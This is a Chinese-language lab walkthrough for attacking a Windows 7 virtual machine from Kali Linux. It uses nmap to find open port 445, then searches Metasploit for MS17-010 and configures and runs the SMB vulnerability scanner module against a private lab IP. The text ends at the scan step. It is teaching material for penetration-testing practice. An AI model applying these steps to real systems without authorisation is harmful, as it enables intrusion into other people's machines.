win7 如何破解系统权限?
(win7 系统如何破解)
一、背景介绍
Metasploit 是漏洞框架。它的全称叫 The Metasploit Framework,简称叫做 MSF。Metasploit 作为世界上最受欢迎的工具,不仅因为它的方便性和强度,还因为它的框架。它允许用户开发自己的漏洞脚本进行测试。Metasploit(msf) 它有多强大?如何利用木马控制受害者主机获得管理员权限?让我们一起学习吧!二、资源设备
1. 安装好 Win 一台 7 的虚拟机
2. 一个准备出发的小白。
3. 安装好的 Kali Linux 一台虚拟机。
三、攻防实战
3.1 如下图所示,配置实验环境。
步骤 1:设置攻击者 Kali 主机和受害者 Windows 主机的网络连接方式相同 (桥接模式或 NAT 模式),如下图所示,我们在这里设置为 NAT 模式。
操作: 右键虚拟机名称 / 选择设置 / 设置网络适配器 NAT
步骤 2:检查受害者主机 IP 地址,如下图所示。
利用 Windows R 组合键输入组合键输入 cmd”命令打开 DOS 界面,输入 ipconfig 命令检查受害者主机 IP 地址。
3.2 利用 Kali Linux 攻击者主机扫描受害者主机,这里使用的工具是 Nmap 工具”,如下图所示。
第一步: 扫描端口,检查受害者主机是否打开 445 危险端口。
命令:nmap 扫描主机 IP
例子:nmap 192.168.78.160
第二步: 扫描结果如下图所示,受害者主机打开 445 危险端口。
3.3 利用 Metasploit(msf)如下图所示,渗透框架攻击受害者主机的针对性漏洞。
步骤 1:启动 Metasploit(msf)如下图所示,渗透框架。
命令:msfconsole
步骤 2:Metasploit(msf)如下图所示,成功启动渗透框架。
第三步:检索漏洞,如下图所示。
命令:search 漏洞编号
例子:search ms17-010
步骤 4:检索相关漏洞的使用模块如下图所示。
第五步:选择相应的漏洞使用模块并使用,如下图所示。
命令:use 模块名称用于漏洞
例子:use auxiliary/scanner/smb/smb_ms17_010
步骤 6:查看所使用的漏洞模块所需的参数,如下图所示。。
命令:show option
步骤 7:设置攻击参数,如下图所示。
命令:set rhosts 受害者主机 IP
例子:set rhosts 192.168.78.160
步骤 8:检查相应的参数是否设置成功,如下图所示。
命令:show options
步骤 9:使用模块运行漏洞,如下图所示。
命令:run
